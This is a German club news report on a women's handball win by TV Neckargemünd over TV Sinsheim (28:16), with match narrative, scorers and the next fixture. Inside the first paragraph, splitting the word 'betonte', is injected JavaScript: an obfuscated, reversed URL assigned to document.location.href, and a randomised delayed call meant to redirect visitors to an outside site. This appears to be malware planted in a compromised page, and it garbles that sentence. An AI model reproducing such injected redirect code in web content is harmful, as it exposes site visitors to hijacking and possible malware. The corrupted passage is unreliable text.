Damen: deutlicher Sieg gegen Sinsheim

Am schönen Bohrermarktssonntag begrüßten die Damen des TV Neckargemünd die Mannschaft des TV Sinsheim. Trainer Tomislav Uremovic betoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonte vor dem Spiel: “ auch wenn unsere heutigen Gegner Tabellenletzter sind, dürfen wir sie nicht auf die leichte Schulter nehmen. Jede Mannschaft in dieser Liga kann Handball spielen“. (Halbzeitstand (14:9) Endergebnis (28:16))
Neckargemünd, 09.11.15 (kkn) – Von Anfang an hielten die Gegnerinnen die heimische Mannschaft auf Trab. In der Abwehr teilten die Sinsheimer Damen ziemlich heftig aus. Der souveränen Schiedsrichterin entging nichts und die Gegnerinnen wurden mit insgesamt 5 Zeitstrafen belastet- die heimischen Damen mit keiner einzigen. Allein in der ersten Halbzeit bekamen die Damen des TVN 10 7-Meter gepfiffen. Charlotte Koch hatte bei diesen eine Ausbeute von 9 Toren.

2. Halbzeit:
Nun hieß es nicht nachzulassen und trotz der Provokationen ruhig zu bleiben. Die Gastgeberinnen bekamen weitere 3 7-Meter, die leider nicht verwandelt werden konnten. Die Damen des TV Sinsheim waren nicht mehr ganz so aggressiv, einige Bälle konnten in der eigenen Abwehr gewonnen und im gegnerischen Tor platziert werden. Auch der eigene Rückzug verbesserte sich, sodass die Gegnerinnen keine Konter mehr ausspielen konnten. Die Konzentration ließ nicht nach und so konnte der Spielstand bis zum 28:16 ausgebaut werden.

Nun heißt es am Samstag, den 14.11.15, früh aufstehen. Die Damen des TVN werden dann um 11:30 Uhr von den Damen der TSG Wiesloch 2 erwartet. Diese sind Tabellendritter. Die Neckargemünder freuen sich auf mitreisende Fans.

Es spielten:
Mulawa ( Tor), Koch (16/9), Knauf (1), Ebert (2), Drescher (1), Pabst (2), Klingenberg (2), Schimek (1), Bucher (3), Lehr, Weitzel, Capriglione